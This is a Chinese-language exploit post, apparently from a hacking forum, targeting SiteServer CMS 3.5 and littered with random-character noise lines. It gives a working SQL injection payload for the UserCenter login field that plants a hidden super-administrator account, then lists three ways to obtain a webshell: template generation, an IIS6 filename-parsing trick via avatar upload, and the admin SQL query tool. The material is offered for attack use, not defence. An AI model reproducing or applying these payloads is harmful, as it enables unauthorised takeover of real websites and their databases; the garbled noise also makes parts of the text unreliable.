经测试秒杀最新的3.5版; C% f& `2 a, r1 t9 r2 U
5 R- E$ }! K }/ R. cstieserver官网:www.siteserver.cn
, d; @! x% f" s' U+ K0 Y' J- G; L8 E# B& i- a# z2 y) M: E; e
9 K% b. ]+ V! b/ Q9 h: S( z+ h8 U8 ^2 e
EXP:9 m9 b1 z' W! t( `
/ L" J( a% f1 {
直接访问UserCenter/login.aspx( ?, w2 m; l6 k ]: N7 d. f
. @ U9 y! a9 l! z$ D% i
+ n& ], m0 I, e/ P# t) Q t- K- m& |% ?/ g% k8 w
用户名处输入:
+ s$ ^& C3 ?3 w( ^0 O5 H( l& f* w
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
& u6 B! ]8 t- B5 u! q g, e. ?8 J/ y: Z8 i3 l: b; z- b
+ U% L' q- z4 K4 A5 A
/ }) c1 N: Q4 ^( ]* w2 \* H
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。& c: Q+ n1 r5 R' A9 I: s0 w/ N
7 ^; K" P$ w+ J/ m" G- p* P - h% M$ M5 @/ _" ^$ V5 {
: [1 n; _9 R! E ?# I* Y之后再访问后台SiteServer/login.aspx用插入的用户登陆
) x/ R: V( R2 }) {3 \7 R+ D( V/ C7 H( [
# c5 B, \' o& k( r: A5 V0 A
: N/ J" V6 L8 c% L) a后台拿webshell的三种方法:
; l# K8 C* L6 N% @ B9 ]- W
" ?. e& }3 x, A3 Z一、
! n! u0 P. L, |
# f: l* h2 S4 G, k站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
! E$ @2 [0 ]. a6 A
# U) M* {, @2 o5 R7 |1 I7 K二、
2 x, a! s' |* }+ I9 b# `
& K) {3 E$ L- [* I7 q! E成员权限-》添加用户-》用户名为:1.asp
+ h9 l/ Y; r( T6 k( T+ y/ n3 k
D0 ~/ N! [ ?7 K! y! v5 Ghttp://127.0.0.1/usercenter/, t4 T% u2 @. c- G. C# l
! d ~; t8 H6 H" S9 S& T: u6 k
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
8 f* f; w0 f+ m. y5 M+ F; I# e/ F4 L9 G. m E# e
(ps:后台添加用户时不会验证是否含有非法字符)) `( v# p0 l7 B& _$ N. X) o
2 x3 I6 p" v0 Q3 |9 \3 A. Q
三、* C) Q' ~$ J1 w" m6 D
2 p3 u5 n0 x6 N% _' h# E9 M# ~1 ~系统工具-》实用工具-》机器参数查看
/ V$ z) o( e5 A1 L6 m可以看到数据库类型、名称,WEB路径. E( X, Q3 d; ] ]4 _ B
; ?3 O& Y$ ], p0 l+ D
系统工具-》数据库工具-》SQL语句查询$ }( h& m5 u$ M9 D5 v8 s5 L
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。9 H+ H) x0 u. \8 N. A
9 Y y% u: N! f+ i* D: ~( ~' u3 \ |